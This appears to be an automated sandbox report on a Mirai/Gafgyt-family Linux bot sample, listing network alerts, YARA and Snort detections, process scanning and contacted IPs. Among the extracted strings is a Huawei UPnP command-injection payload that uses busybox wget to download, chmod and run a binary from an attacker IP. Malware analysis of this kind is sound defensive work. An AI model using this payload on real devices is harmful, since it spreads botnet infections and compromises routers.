            Source: unknownNetwork traffic detected: HTTP traffic on port 39168 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39240 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45052 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40182 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45916 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35286 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53586 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44206 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36996 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42880 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41170 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57468 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39156 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42086 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47774 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36646 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53466 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37960 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50956 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53454 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36634 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33850 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42074 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39144 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53902
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53900
            Source: unknownNetwork traffic detected: HTTP traffic on port 52116 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53906
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53904
            Source: unknownNetwork traffic detected: HTTP traffic on port 36658 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36622 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50968 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47316 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53908
            Source: unknownNetwork traffic detected: HTTP traffic on port 47786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53914
            Source: unknownNetwork traffic detected: HTTP traffic on port 48630 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53912
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53916
            Source: unknownNetwork traffic detected: HTTP traffic on port 37972 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56238 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45808 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 48654 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44292 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47328 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52104 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 38276 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41936
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41938
            Source: unknownNetwork traffic detected: HTTP traffic on port 50920 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41932
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41934
            Source: unknownNetwork traffic detected: HTTP traffic on port 42050 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39120 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41930

            System Summary

            barindex
            Source: huhu.arm7.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: 5478.1.00007f91dc017000.00007f91dc034000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: Process Memory Space: huhu.arm7.elf PID: 5478, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: huhu.arm7.elfELF static info symbol of initial sample: __gnu_unwind_execute
            Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.146 -l /tmp/linuxxx -r /huhu.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: Initial sampleString containing 'busybox' found: /bin/busybox
            Source: Initial sampleString containing 'busybox' found: busybox
            Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKskyljne.armskyljne.arm5skyljne.arm6skyljne.arm7skyljne.mipsskyljne.mpslskyljne.x86_64skyljne.sh4<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.146 -l /tmp/linuxxx -r /huhu.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
            Source: Initial sampleString containing 'busybox' found: Content-Length: /proc//proc/%s/exe/proc/self/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemd/usr/libexec/openssh/sftp-serverusr/shellmnt/sys/bin/boot/media/srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearropbearencodercundi/var/cundi/system/root/dvr_gui//root/dvr_app//var/tmp//anko-app//opt/POST /goform/set_LimitClient_cfg HTTP/1.1
            Source: Initial sampleString containing 'busybox' found: /proc/proc/%d/cmdlinewgetcurlbusyboxechocatnano
            Source: huhu.arm7.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: 5478.1.00007f91dc017000.00007f91dc034000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: Process Memory Space: huhu.arm7.elf PID: 5478, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: classification engineClassification label: mal100.troj.linELF@0/1025@18/0
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/1583/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/2672/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/110/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/111/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/112/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/113/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/234/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/1577/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/114/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/235/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/115/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/116/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/117/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/118/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/119/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/10/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/917/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/11/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/12/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/13/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/14/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/15/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/16/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/17/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/18/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/19/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/1593/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/240/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/120/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/3094/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/121/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/242/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/3406/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/1/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/122/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/243/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/2/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/123/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/244/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/1589/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/3/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/124/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/245/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/1588/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/125/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/4/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/246/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/3402/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/126/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/5/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/247/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/127/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/6/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/248/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/128/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/7/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/249/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/8/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/129/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/800/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/9/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/801/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/803/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/20/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/806/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/21/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/807/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/928/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/22/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/23/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/24/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/25/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/26/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/27/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/28/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/29/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/3420/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/490/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/250/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/130/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/251/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/131/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/252/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/132/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/253/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/254/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/255/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/135/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/256/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/1599/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/257/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/378/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/258/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/3412/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/259/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/30/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/35/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/1371/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/260/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/261/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/262/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/142/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/263/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/264/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 5483)File opened: /proc/265/cmdlineJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: unknownNetwork traffic detected: HTTP traffic on port 56152 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 58484 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 56152 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 56152 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 49080 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 49080 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 49080 -> 37215
            Source: /tmp/huhu.arm7.elf (PID: 5478)Queries kernel information via 'uname': Jump to behavior
            Source: huhu.arm7.elf, 5478.1.00007ffd19360000.00007ffd19381000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/huhu.arm7.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/huhu.arm7.elf
            Source: huhu.arm7.elf, 5478.1.000055dee7486000.000055dee75d6000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/arm
            Source: huhu.arm7.elf, 5478.1.000055dee7486000.000055dee75d6000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
            Source: huhu.arm7.elf, 5478.1.00007ffd19360000.00007ffd19381000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: huhu.arm7.elf, type: SAMPLE
            Source: Yara matchFile source: 5478.1.00007f91dc017000.00007f91dc034000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: huhu.arm7.elf PID: 5478, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: Yara matchFile source: huhu.arm7.elf, type: SAMPLE
            Source: Yara matchFile source: 5478.1.00007f91dc017000.00007f91dc034000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: huhu.arm7.elf PID: 5478, type: MEMORYSTR
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
            Valid Accounts1
            Scripting
            Path InterceptionPath Interception1
            Masquerading
            1
            OS Credential Dumping
            11
            Security Software Discovery
            Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
            Encrypted Channel
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationAbuse Accessibility FeaturesAcquire InfrastructureGather Victim Identity Information
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
            Scripting
            LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
            Non-Standard Port
            SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
            Domain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration4
            Non-Application Layer Protocol
            Data Encrypted for ImpactDNS ServerEmail Addresses
            Local AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureTraffic Duplication5
            Application Layer Protocol
            Data DestructionVirtual Private ServerEmployee Names
            Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeyloggingScheduled Transfer3
            Ingress Tool Transfer
            Data Encrypted for ImpactServerGather Victim Network Information
            No configs have been found
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Number of created Files
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1377578 Sample: huhu.arm7.elf Startdate: 19/01/2024 Architecture: LINUX Score: 100 22 haha.skyljne.click 2->22 24 41.188.184.60 simbanet-tzTZ Tanzania United Republic of 2->24 26 99 other IPs or domains 2->26 28 Snort IDS alert for network traffic 2->28 30 Malicious sample detected (through community Yara rule) 2->30 32 Antivirus / Scanner detection for submitted sample 2->32 34 5 other signatures 2->34 8 huhu.arm7.elf 2->8         started        10 gnome-session-binary sh gsd-print-notifications 2->10         started        signatures3 process4 process5 12 huhu.arm7.elf 8->12         started        process6 14 huhu.arm7.elf 12->14         started        16 huhu.arm7.elf 12->16         started        18 huhu.arm7.elf 12->18         started        20 2 other processes 12->20

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            huhu.arm7.elf61%ReversingLabsLinux.Trojan.Mirai
            huhu.arm7.elf100%AviraEXP/ELF.Mirai.Gen.J
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://103.245.236.146/huhu.mips;$0%Avira URL Cloudsafe
            http://103.245.236.146/huhu.mpsl;0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            haha.skyljne.click
            103.245.236.146
            truetrue
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://103.245.236.146/huhu.mpsl;huhu.arm7.elffalse
              • Avira URL Cloud: safe
              unknown
              http://103.245.236.146/huhu.mips;$huhu.arm7.elffalse
              • Avira URL Cloud: safe
              unknown
              http://schemas.xmlsoap.org/soap/encoding/huhu.arm7.elffalse
                high
                http://schemas.xmlsoap.org/soap/envelope/huhu.arm7.elffalse
                  high
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  217.10.8.7
                  unknownGermany
                  25538IN-ULMDEfalse
                  157.175.218.29
                  unknownUnited States
                  16509AMAZON-02USfalse
                  191.232.45.243
                  unknownBrazil
                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                  183.109.40.128
                  unknownKorea Republic of
                  4766KIXS-AS-KRKoreaTelecomKRfalse
                  178.204.80.254
                  unknownRussian Federation
                  28840TATTELECOM-ASRUfalse
                  203.183.154.93
                  unknownJapan4725ODNSoftBankMobileCorpJPfalse
                  117.137.76.78
                  unknownChina
                  9808CMNET-GDGuangdongMobileCommunicationCoLtdCNfalse
                  124.78.246.133
                  unknownChina
                  4812CHINANET-SH-APChinaTelecomGroupCNfalse
                  187.246.98.25
                  unknownMexico
                  13999MegaCableSAdeCVMXfalse
                  197.169.172.186
                  unknownSouth Africa
                  37168CELL-CZAfalse
                  38.169.130.29
                  unknownUnited States
                  174COGENT-174USfalse
                  137.63.255.69
                  unknownUganda
                  327687RENUUGfalse
                  201.89.27.73
                  unknownBrazil
                  8167BrasilTelecomSA-FilialDistritoFederalBRfalse
                  41.188.184.60
                  unknownTanzania United Republic of
                  37084simbanet-tzTZfalse
                  73.189.128.122
                  unknownUnited States
                  7922COMCAST-7922USfalse
